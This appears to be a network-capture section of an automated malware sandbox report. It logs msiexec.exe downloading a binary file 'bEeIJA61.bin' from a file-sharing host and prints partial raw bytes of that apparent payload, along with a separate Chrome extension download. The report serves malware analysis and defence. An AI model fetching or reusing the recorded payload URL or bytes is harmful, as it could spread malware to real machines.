                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w9FPsQK56CH7ltbNhtF1iSX2N355skJnFDlgeqmzC6UPS1YBp9AhzzEKJF9vT%2F09nZjCu7HIvojhkZ6i%2FwyqleF8csiTg6D%2FbAb6JoDU2UEvevawT4xSvAyHvvxgln930v4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8e0c76f9698dd1b7-ATL
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=117425&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=828&delivery_rate=32586&cwnd=252&unsent_bytes=0&cid=b95128da10473f5b&ts=797&x=0"
                                                                                                                                                                                                        2024-11-11 07:10:50 UTC128INData Raw: 38 30 0d 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 0a 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 30 2e 66 69 6c 65 74 72 61 6e 73 66 65 72 2e 69 6f 2f 73 74 6f 72 61 67 65 2f 64 6f 77 6e 6c 6f 61 64 2f 44 53 4f 6e 4b 33 77 38 33 4f 31 64 22 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 68 65 72 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 61 3e 2e
                                                                                                                                                                                                        Data Ascii: 80<h1>Redirect</h1><p><a href="https://s20.filetransfer.io/storage/download/DSOnK3w83O1d">Please click here to continue</a>.
                                                                                                                                                                                                        2024-11-11 07:10:50 UTC6INData Raw: 3c 2f 70 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: </p>
                                                                                                                                                                                                        2024-11-11 07:10:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        1192.168.11.2049768172.67.200.964435024C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-11-11 07:10:50 UTC281OUTGET /storage/download/DSOnK3w83O1d HTTP/1.1
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                        Host: s20.filetransfer.io
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Cookie: nette-samesite=1; PHPSESSID=cavpeluj70i7r0fo9pbtami48v
                                                                                                                                                                                                        2024-11-11 07:10:52 UTC1240INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 07:10:52 GMT
                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                        Content-Length: 493120
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Last-Modified: Mon, 11 Nov 2024 02:26:23 GMT
                                                                                                                                                                                                        Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                                                                                                                                                                                                        Set-Cookie: PHPSESSID=8153453912c49d074cbf137b7b8914b9; expires=Mon, 25-Nov-2024 07:10:51 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                        Content-Disposition: attachment; filename="bEeIJA61.bin"
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        ETag: "67316b4f-78640"
                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RqRbivRMJfrOAp1tapJCCxtfSoWSrTsDZyqW1zP3QVcuP9WU0pH5Ij0AbfLi97BDDqTYRMnpnJIHaDSZUxgX040ySRMisBKqknh2EDEMrLSkcL5UPKwxe9xtczH6n591uVjyZ%2Fr%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8e0c7700dae2678a-ATL
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=117509&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=895&delivery_rate=32574&cwnd=252&unsent_bytes=0&cid=029e98403a7986df&ts=1592&x=0"
                                                                                                                                                                                                        2024-11-11 07:10:52 UTC1369INData Raw: a1 5b bd a6 56 67 00 60 b6 be 72 d0 36 53 8e 1a 58 59 88 40 ef 2a 0f a5 ec 41 b9 cb 03 75 a4 f7 ce fe 60 05 65 57 d5 cd 34 38 f5 2d f1 ef 80 26 55 a8 fa e3 a2 6b fe b6 bd 56 2a 3d da 68 23 7a 04 aa c6 96 65 f8 5c c4 a4 6a 12 86 24 a6 09 85 46 a2 d4 70 15 78 c3 3c 0c 09 b6 ed d8 c0 f8 17 09 bc f1 4c 65 ac 87 9e 0d dd 63 5c 16 aa 37 09 c3 26 04 33 3c 99 76 e2 ad e9 8d 4f a0 e9 e5 c4 38 c5 2b d6 2e 83 b4 a2 5d 4b a8 a9 44 66 b7 01 14 b7 9a 5e 8a 37 e0 41 e9 13 dc a7 fc 31 ff cf aa 14 ef 44 cc b7 f6 e2 07 6e 83 ea 5c 88 45 4d 01 00 b9 59 68 a9 bf eb bc 73 b7 d9 5c 16 64 69 1b 9c 18 20 ea 21 8c 12 7d 5d 31 e3 bd 76 01 54 b6 6d 90 4d ad 8f 47 c4 5c c8 d7 fc a0 0c 69 0a 47 51 63 20 ef cc 27 2d 0b 29 a2 34 b9 cd 84 0a 4a 25 44 4e 58 9d 0f e3 4b c5 35 74 7a 2b 34
                                                                                                                                                                                                        Data Ascii: [Vg`r6SXY@*Au`eW48-&UkV*=h#ze\j$Fpx<Lec\7&3<vO8+.]KDf^7A1Dn\EMYhs\di !}]1vTmMG\iGQc '-)4J%DNXK5tz+4
                                                                                                                                                                                                        2024-11-11 07:10:52 UTC1369INData Raw: a2 da c2 54 7c 63 05 5d 7a c7 63 64 4f a8 29 15 ee 71 27 53 ef ef 71 10 c6 e0 e5 71 b8 c8 18 d9 51 8a 93 6d 6c 38 e7 4d af e2 a6 58 b3 1e fc 93 ff 3c 18 23 96 72 db f5 b1 89 56 b5 92 73 b0 81 98 42 5d 44 5b 36 0c ca 89 8d 18 e9 28 d5 d7 9a 2c 55 1c 18 b0 ad 29 30 4a f0 0f 55 df b0 1c 83 a0 82 c1 8a db 59 61 ea 93 e7 d4 98 09 5f c0 3c 15 ca 5e 12 a7 c0 f8 7f 70 d1 b4 4c 8d a7 a0 9d 0d 84 a0 b4 3a 29 37 09 ab 58 69 76 3c 71 8c c4 ae e9 d4 8c c2 e8 5c 74 77 9d 91 30 2c 18 bd 6f 14 70 c4 a0 89 af 01 4f 7e c4 e3 ed 92 58 3e 03 ca 39 fc 2c 77 71 91 a0 b6 95 e0 64 ec 2d 49 aa 24 07 b4 09 a1 77 54 2a 6c 87 1e 31 46 a4 da 4a f5 36 b7 31 e8 30 67 69 be 76 16 64 10 2e 55 0d 90 19 e8 14 6d 8b b5 e6 ba 51 26 9c 05 c7 c7 f0 e9 e4 bf 4c b3 ac 27 f0 4b 85 20 68 24 c1 fe
                                                                                                                                                                                                        Data Ascii: T|c]zcdO)q'SqqQml8MX<#rVsB]D[6(,U)0JUYa_<^pL:)7Xiv<q\tw0,opO~X>9,wqd-I$wT*l1FJ610givd.UmQ&L'K h$
                                                                                                                                                                                                        2024-11-11 07:10:52 UTC1369INData Raw: d8 64 d5 1a 29 04 f9 e4 c0 b8 ec 07 a7 e6 d4 2b 56 47 92 6a 86 02 f8 94 92 1a 2d 8c 2b 33 45 b5 84 0c 79 23 27 85 bb 38 fa 82 16 74 8a 66 25 23 65 97 a5 c5 b7 79 72 cb 95 cc fb cf 0e 51 27 06 2f df e2 58 e5 72 51 30 fe 5e 1f 64 69 8f e7 ae f4 89 b5 20 17 2b b0 69 d0 23 dd ba 00 87 46 55 fc de 03 46 69 24 c2 d6 30 75 71 02 3d 09 3f 1b 17 19 54 9e 66 f8 0f 91 f6 3d 78 86 24 6c b1 9f b9 a2 5f 81 a8 2c fe 7b 4c 5f 3d 20 30 a1 fe 17 09 37 39 a4 3e ab 87 9e 86 e0 f3 61 51 aa bc d7 02 c5 01 b8 f1 cf 75 19 45 ac 8b 4f a8 63 2d 2c 5f dd 91 d8 a7 30 1c d7 66 b4 a9 6c ce 43 d0 a9 17 e4 ed a7 bf 50 0e 74 84 f7 bb d4 14 18 85 5f eb 20 96 66 ec 3a 96 d0 53 42 ed 6b 88 fa 51 6d 06 4f de ff 16 5b 87 f5 83 34 b7 26 49 4e 10 2c e7 ea f1 d9 09 aa 00 6e 29 96 0c ec 61 9f f4
                                                                                                                                                                                                        Data Ascii: d)+VGj-+3Ey#'8tf%#eyrQ'/XrQ0^di +i#FUFi$0uq=?Tf=x$l_,{L_= 079>aQuEOc-,_0flCPt_ f:SBkQmO[4&IN,n)a
                                                                                                                                                                                                        2024-11-11 07:10:52 UTC1369INData Raw: 93 65 36 51 57 c6 f7 ae 79 ed ba 44 8f da 0c c6 47 a4 aa ce 1c 5e e3 2f 7b 39 b4 e2 33 c0 15 cb 65 66 78 07 bf 1b e9 f0 77 e4 ed aa 96 0d 29 a6 ca c1 3c e4 70 c9 0a 1a 1b bd 0b e4 27 ef 44 3a ec cc da b2 2b ab 0c ff 7e d0 a5 36 b7 8f 72 d3 4a cd fb 69 69 7d e7 a5 8f 94 62 1c ce e9 86 93 46 44 99 8c 95 13 f7 fe 8d 02 f8 77 7c d4 b7 6a 12 a4 a6 47 8b b1 91 ea 42 89 1c 0e c6 1c 5e de 60 74 f2 9d 94 cc 5f 33 79 0f 43 96 15 bd 5c 4f 58 e9 ed 79 ae 5e 3b 45 17 56 d4 70 15 f3 f6 38 3f 4c b6 60 9c e4 e8 42 59 d6 f5 11 30 c4 2b cc 4b dd 34 a3 c0 c0 37 84 87 02 10 63 69 14 32 c6 8d b9 da b0 7e 82 e5 49 72 fe 85 88 7b 5f 09 3d 3a f3 fe 1a 5f 2d e3 e4 39 e0 ae 7e ad 30 3b 61 ce 7e ab 3b 4b 35 91 2d 9a 10 99 71 b9 48 c7 a8 03 57 ba 35 ce ad 16 e0 28 4b c9 6c 2c a6 3f
                                                                                                                                                                                                        Data Ascii: e6QWyDG^/{93efxw)<p'D:+~6rJii}bFDw|jGB^`t_3yC\OXy^;EVp8?L`BY0+K47ci2~Ir{_=:_-9~0;a~;K5-qHW5(Kl,?
                                                                                                                                                                                                        2024-11-11 07:10:52 UTC1369INData Raw: bc d2 32 9b e9 ae f8 ba 66 1b b6 9d 84 54 80 c6 cb 68 95 9e 52 cb 21 1f 8b 8e 42 f8 b2 b7 7c 9e 84 2b 31 fe 70 dc 88 0a 9f 49 98 cc 9f 38 ad a4 13 21 8a 75 56 bf f9 87 60 f4 68 1c 0f 2e e7 eb d8 20 63 70 c1 5b c7 c4 96 13 b8 b1 c8 c8 54 5d 83 17 9c 9b a4 8a b8 50 63 d4 ad 25 bc 6c 48 c3 7f 17 e5 22 bf 20 77 d7 b9 16 fe 3c 01 24 be 6c 0c 90 2e b4 bb 8b 50 d6 ba 44 d3 95 69 ef 4f 25 c4 81 d6 cd 0b c9 4f 30 80 ee 90 ac 28 f0 b5 aa 97 03 da 09 69 8e 5c 76 15 66 26 d6 49 ad 3a e8 b6 0f dd 66 ed 36 b4 eb 5f 95 ed 02 1b 2d 1c 0e b0 b6 95 21 ea 4e 48 f3 a4 0f 49 12 27 4b 30 ff 4f b8 f1 4c e6 ca 97 9e 80 98 9c 0c 40 6d 71 1d cc 26 04 33 fa dc 89 e2 45 29 7e b0 57 b1 bc 9b 68 13 52 8d a5 db ec 87 ab 0d 56 1a 04 0a 1c af 38 3b ba 7f a8 db e7 23 88 b9 bc d0 92 5f 91
                                                                                                                                                                                                        Data Ascii: 2fThR!B|+1pI8!uV`h. cp[T]Pc%lH" w<$l.PDiO%O0(i\vf&I:f6_-!NHI'K0OL@mq&3E)~WhRV8;#_
                                                                                                                                                                                                        2024-11-11 07:10:52 UTC1369INData Raw: 6c e2 38 bd 9a ae 7b 56 1e 30 81 b2 de bb e7 5b 75 0d 96 8e f8 d3 71 6e a8 78 35 9d 55 be 11 ad 32 e4 3d 6d 56 c3 e3 5c 07 ab 1e 56 b6 bb dc eb c0 9a 03 f9 a5 97 f2 51 6c ec 0c 05 8f 3c 04 c6 5f 54 c8 33 68 7a b5 4c bb 61 76 f6 6a 1a 3b df 36 b8 ef cb 8b 57 f3 e3 2a 24 98 b0 02 81 56 64 0b 8c f0 15 c8 68 21 bd 86 f0 8b 9f de 10 bb 00 06 45 bf 8b 13 b6 78 58 b1 38 49 cf 47 df 27 3f 9c 64 04 c3 58 2d 0f 6d fc c6 a5 d3 a6 f9 82 10 82 48 b0 3f 6c 65 4c 84 73 81 3e 65 bb 12 b8 6a 10 35 a1 30 26 fd 5d 6c cd ca 18 58 30 19 df 9a cf 74 55 55 d6 ce 13 9c 0d d4 52 f0 ef f0 9f 2d 9c 84 ed 79 32 46 e7 7a 01 1a 7e da bf 72 00 b7 18 2d be 66 9c e4 fc 9c 03 87 f9 43 27 6e 44 cd 58 8b e8 b6 9d 73 60 82 0e ce ae 36 3c 99 fd 2f 26 19 65 cb 53 17 1a 4f 4a fe 85 f3 de bc 72
                                                                                                                                                                                                        Data Ascii: l8{V0[uqnx5U2=mV\VQl<_T3hzLavj;6W*$Vdh!ExX8IG'?dX-mH?leLs>ej50&]lX0tUUR-y2Fz~r-fC'nDXs`6</&eSOJr
                                                                                                                                                                                                        2024-11-11 07:10:52 UTC1369INData Raw: a6 f1 e4 94 99 fe 67 de ea ac 7c 0f 4d cd 12 6d c2 4e a2 34 7c b9 2a 7d c0 aa 81 bd 33 f3 17 be b3 30 81 c0 45 73 5e bf 21 6f 2c 79 21 7e 59 0a 12 7b ee 55 1c 1f 18 15 66 91 35 85 ab 96 6b 5c 97 31 c8 d9 c7 34 d8 c5 03 df ff a9 b2 f4 0b 00 84 a0 c9 01 8f 0e 19 2b 94 27 59 d4 9f 94 42 25 67 ce dc 5c 39 4c be 15 f5 b0 4f 18 08 a5 26 68 51 f0 66 b3 a9 fe cc dd c8 32 e5 f3 40 24 c9 e0 67 04 32 32 70 64 bd b8 52 99 51 74 67 ba 20 58 8f 53 6f 31 31 75 8b ec 87 fd d4 b7 ce 95 88 51 30 3a 2e 08 fe 56 5c 42 af cf 9e 4f 57 a1 63 ad a8 04 3a ff 76 73 b8 e4 95 6d 0e c9 47 09 e5 42 87 3c e7 fe 30 82 5c 9a af 32 fa 9b ef 1b d2 d5 4d f0 03 1d 8a ab 0a 93 2b 93 fa b4 2f a6 f6 0e ab aa 5f 80 9e 26 d3 07 96 7e 82 d4 8e d4 8c 38 7a aa 37 09 6d ac ac 4d f2 a8 6b d7 d9 f8 df
                                                                                                                                                                                                        Data Ascii: g|MmN4|*}30Es^!o,y!~Y{Uf5k\14+'YB%g\9LO&hQf2@$g22pdRQtg XSo11uQ0:.V\BOWc:vsmGB<0\2M+/_&~8z7mMk
                                                                                                                                                                                                        2024-11-11 07:10:52 UTC1369INData Raw: bd 16 34 d4 b8 56 f8 8f ad 8f 2b 43 b0 93 81 b0 55 5d d0 2b 5e ab 0b 72 4c 54 f3 53 1d 3a 73 0c ec 76 e2 90 53 ce 05 f3 0f a5 9b 29 9b 96 ea 35 58 de 19 12 6a ac c2 e6 a6 30 81 ef 0c a7 d9 bb 71 b7 e2 9d 22 1d d4 f3 bb d3 ee 6d 18 15 be 30 95 b3 d5 d6 fa 65 97 d7 bb 70 18 1e cd e9 cb e1 d1 ca eb 02 b8 7e 08 d2 09 a5 ce 8c ca 47 10 6f 53 7f 15 c8 5b 0e 55 27 6b 9b 89 75 f7 63 a6 89 6d 6e ec 1c 08 7f b6 b8 65 b2 ed 99 96 8b f2 bf dc 32 59 0b bc db 8e 4d df 33 30 ef e8 07 97 50 ee 99 da 33 fc 64 67 c7 f4 a4 81 12 93 e8 fe 93 75 9a c0 cd 76 1c e4 63 44 0a 2c 1f fa 35 80 7c b9 bb d3 08 b2 ba 38 22 3a cd 1a fe 72 3a 9e 52 1f 13 4f c9 0e f2 8e 43 be c0 23 fc 1f d3 5c 45 6f ed 9a 5f 3b 9b 5b 47 c4 f4 61 c1 36 10 d8 27 5f 95 41 d3 8c b1 7e 66 01 5d 5f b6 3e bb 93
                                                                                                                                                                                                        Data Ascii: 4V+CU]+^rLTS:svS)5Xj0q"m0ep~GoS[U'kucmne2YM30P3dguvcD,5|8":r:ROC#\Eo_;[Ga6'_A~f]_>
                                                                                                                                                                                                        2024-11-11 07:10:52 UTC1369INData Raw: 68 92 8d 6a 29 5a 34 9f 01 0b dc a9 a4 bf 2a 4d 10 89 02 f2 e4 08 3e 4e cf e5 2b d5 af 26 2a 50 ba f3 bb 98 6b 10 c8 f8 2e 27 0b 63 07 8e d8 5e a2 63 18 ac 76 77 92 78 d6 e5 3f 97 49 ce af d1 a0 58 b5 75 55 75 15 35 4d aa a0 bd 05 ef a3 ca 87 20 69 8d a1 01 e4 38 3d c6 75 5a b7 ad 48 ec 6f 2c 65 10 10 cd 02 51 ce 69 01 63 86 de 4c 4c 99 e3 58 f2 c7 4a cb 6b 4e 57 88 59 a5 5f 1e ae 93 38 80 00 06 13 64 fa 06 c7 50 24 e9 a9 42 5b 17 20 52 d6 ba 38 e9 5e 45 27 d1 7c 2c 0e 0f 48 ee 1b 99 f3 bd 26 8a 93 43 22 22 1b 37 00 29 4a 98 cc 4f 9b 53 cb 58 22 c6 12 62 22 04 6a f6 2c 80 89 f5 61 50 3f 8d 28 ae 01 bf 18 11 f6 ab 81 d7 85 f5 0e 02 6a 79 6c b9 cf 1c 40 b6 13 b0 31 91 da 69 06 ff cc 4f 96 5d 21 7a 64 52 a6 5d f9 17 35 e7 58 39 24 a3 be 64 d8 57 a9 4f ba 98
                                                                                                                                                                                                        Data Ascii: hj)Z4*M>N+&*Pk.'c^cvwx?IXuUu5M i8=uZHo,eQicLLXJkNWY_8dP$B[ R8^E'|,H&C""7)JOSX"b"j,aP?(jyl@1iO]!zdR]5X9$dWO
                                                                                                                                                                                                        2024-11-11 07:10:52 UTC1369INData Raw: 32 e0 2b 32 73 b9 4f cf f3 7b 0c 07 09 de 64 c5 f5 5e c9 8b 29 28 c4 f7 e3 d6 f6 17 fb 9b d7 bf 07 d7 d8 d9 d5 35 dd 97 df d0 2e f5 48 95 02 c7 d8 31 99 7a af d1 6b 7c 52 81 0a 6b c4 1e 08 8a 21 91 86 4d a5 2a d8 5e ba fe 52 f1 5c f2 67 d1 78 a2 4d 93 31 9c fa 87 a0 7f b5 aa 5a 75 15 41 e1 05 7d bd b8 00 5e 9a b3 cf f5 96 47 16 1d b3 71 e2 e2 b7 2f 54 99 e3 b8 0f 89 46 47 cd b8 ce d4 ec d5 12 eb 65 97 a3 bb 64 1e ea 19 71 dc a4 33 65 fc 56 38 91 7c 9f 93 c0 c2 e9 96 57 40 e2 07 c7 56 24 62 ba 42 5b 9d 21 7a 7d fc 13 11 46 d0 cc d1 57 56 73 25 e7 30 b1 ed 9c 4a 43 8e b0 8d d2 f2 a1 4b a9 40 bd bc 65 26 68 77 07 dd ba 11 66 08 2d 67 ef 75 11 77 d0 f3 64 33 d1 26 5c 1d ae eb d4 f8 7d e7 a5 9f 2d 5a 80 15 22 cf c3 cd 8a b0 74 67 65 4c 51 77 d7 fd b8 00 42 94
                                                                                                                                                                                                        Data Ascii: 2+2sO{d^)(5.H1zk|Rk!M*^R\gxM1ZuA}^Gq/TFGedq3eV8|W@V$bB[!z}FWVs%0JCK@e&hwf-guwd3&\}-Z"tgeLQwB


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        2192.168.11.2049781172.217.215.1324435764C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC570OUTGET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1
                                                                                                                                                                                                        Host: clients2.googleusercontent.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC573INHTTP/1.1 200 OK
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Content-Length: 135771
                                                                                                                                                                                                        X-GUploader-UploadID: AHmUCY3sL20lYQ-SFQu8BXDKIJekTpQ_uYwJxgOxe2Y2S0n3tpNxQgWBwKg9buuRnRQtjmCnn3ESUY0HdQ
                                                                                                                                                                                                        X-Goog-Hash: crc32c=5YFIVw==
                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 03:40:16 GMT
                                                                                                                                                                                                        Expires: Tue, 11 Nov 2025 03:40:16 GMT
                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                        Age: 12648
                                                                                                                                                                                                        Last-Modified: Tue, 22 Oct 2024 20:33:19 GMT
                                                                                                                                                                                                        ETag: a1239f8c_b608f476_b1045d58_830b10c8_3ed9cb2d
                                                                                                                                                                                                        Content-Type: application/x-chrome-extension
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC682INData Raw: 43 72 32 34 03 00 00 00 e2 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                        Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC1255INData Raw: 3c 04 c7 2e 17 9c 82 72 2d eb 27 90 de 78 70 f5 48 1e c4 51 f0 2e a9 38 02 21 00 d7 52 5e e9 bc c9 c7 25 83 97 57 30 dd 0e 9e b8 71 9c c0 fa 93 67 2e 44 b2 eb ac 92 7e ec 9e ae 22 f0 25 1f 8b 08 00 00 00 00 00 00 ff 95 9a 6d 6f b3 3a b6 86 ff ca e8 f9 3c 23 61 08 dd 65 be 95 04 43 68 70 8a f1 0b 78 34 7a 04 98 94 80 21 b4 21 0d 61 b4 ff fb 71 67 6f 1d 8d b4 f7 70 38 aa 54 89 36 c1 f8 f2 5a f7 ba 97 f1 3f fe f5 43 56 d7 f2 f3 3c 8c e7 4b ff e3 ef 3f c6 cf aa aa f3 6b fd 97 a1 fa fc cb e9 ac aa 1f 7f fd 71 3d bf f7 95 fc 59 5e fa b1 ea c7 1f 7f ff d7 8f 21 7f a8 4b 2e f5 e7 ab 47 d8 14 a6 6d 08 6e 1b a9 59 d7 a5 59 ab f2 b1 7f e2 d6 f5 9c 75 d3 57 66 8e a7 d2 54 4f 22 d9 3f a1 dd 8b 8d ce f7 b3 f0 55 2f 52 64 ec 9b cb 59 7f be 8e 1a 6a ee bf ff de a9 ab 48
                                                                                                                                                                                                        Data Ascii: <.r-'xpHQ.8!R^%W0qg.D~"%mo:<#aeChpx4z!!aqgop8T6Z?CV<K?kq=Y^!K.GmnYYuWfTO"?U/RdYjH
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC1255INData Raw: 75 58 ab 3f 31 af eb a4 bb 9a 49 02 b6 d1 0e 87 31 05 a0 6a 9d 18 f9 f6 0d 71 db a4 bc 34 f4 da 9f 72 cb f5 a5 72 0c 31 d7 7b 09 06 4a 16 eb 2e 9b d3 39 9e 8e 2b e3 00 b5 ec 22 8c e7 b9 0c 86 29 21 f8 84 88 3c a1 56 bd 09 6b b8 a6 a0 4e 90 8a 41 64 b1 47 69 d5 49 d5 0f af 45 07 78 62 5c ac 65 0d 64 c6 ca 18 e8 48 fa 6e e1 46 9e 84 51 7b d5 ae bd 6b ce a7 bc c1 1e 4d 71 96 1a c3 cc a1 dc 72 df ce 4b d3 de 4a 93 0d cc 47 57 e4 97 cb 79 98 ae ac fd bd bb e5 7d 39 51 00 3f 24 07 b7 24 70 af 28 01 3e db 51 ab 60 03 2d 66 84 49 2f 37 9c 45 76 61 d4 3e d9 c1 4b e5 0d 1b ee 2f ae 7f 97 ad 65 4f 60 5f 28 77 c7 77 f2 c1 69 18 6b ee 09 67 78 10 ac b6 65 62 58 91 8f 0e 89 2f ba 28 15 17 d4 23 4a a9 71 2f bc 81 2c d7 7e 31 ac f5 bc b1 31 5a 88 1b 77 cc 06 18 f9 d1 78
                                                                                                                                                                                                        Data Ascii: uX?1I1jq4rr1{J.9+")!<VkNAdGiIExb\edHnFQ{kMqrKJGWy}9Q?$$p(>Q`-fI/7Eva>K/eO`_(wwikgxebX/(#Jq/,~11Zwx
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC1255INData Raw: 2d 03 61 ea b5 10 71 6b 07 a5 85 2f 72 d1 e7 4c e6 4a f6 3d 51 43 1c 13 65 e9 1e 86 08 e0 3c 2a cf 66 c8 cb ee 47 e8 46 79 2f 9f b0 42 4f 88 84 a7 8c c4 66 d4 8e bb cc b4 f9 d1 5f ee 33 0b 7e 5f c9 7e dc 1f 7d 7b 27 bc 9a 56 cc fd 2a e8 c8 f2 39 d6 3e 5a 46 95 57 77 05 55 5f 89 c7 36 94 3b 21 f1 50 94 b5 30 e7 9e 7d 2f a8 b1 c4 7e 5c 1d f7 3a a7 12 c8 ba ac 05 37 b6 05 1f d8 14 24 9a c5 57 69 ed ef 68 96 54 34 da 77 e8 95 d6 da fb ca db b1 8d 48 0d 4b 0e eb e5 7d 16 b0 d6 e7 bc 7e ef db 94 5d f8 89 3a 89 09 7f 36 50 83 a6 a8 ad 39 69 dc 83 ae af db 9c c0 36 a1 e3 a5 22 ed 3d 33 b3 b1 54 7b b3 dc c9 c5 1e a3 58 5d 6b c1 13 f1 d8 a7 76 b8 27 d4 28 3b 87 21 3f a6 83 75 f4 f7 33 6e d8 99 51 43 7b 5e 15 10 1a ce 44 c5 8f c2 57 47 c4 75 7d f6 16 f5 7e 5c eb 73
                                                                                                                                                                                                        Data Ascii: -aqk/rLJ=QCe<*fGFy/BOf_3~_~}{'V*9>ZFWwU_6;!P0}/~\:7$WihT4wHK}~]:6P9i6"=3T{X]kv'(;!?u3nQC{^DWGu}~\s
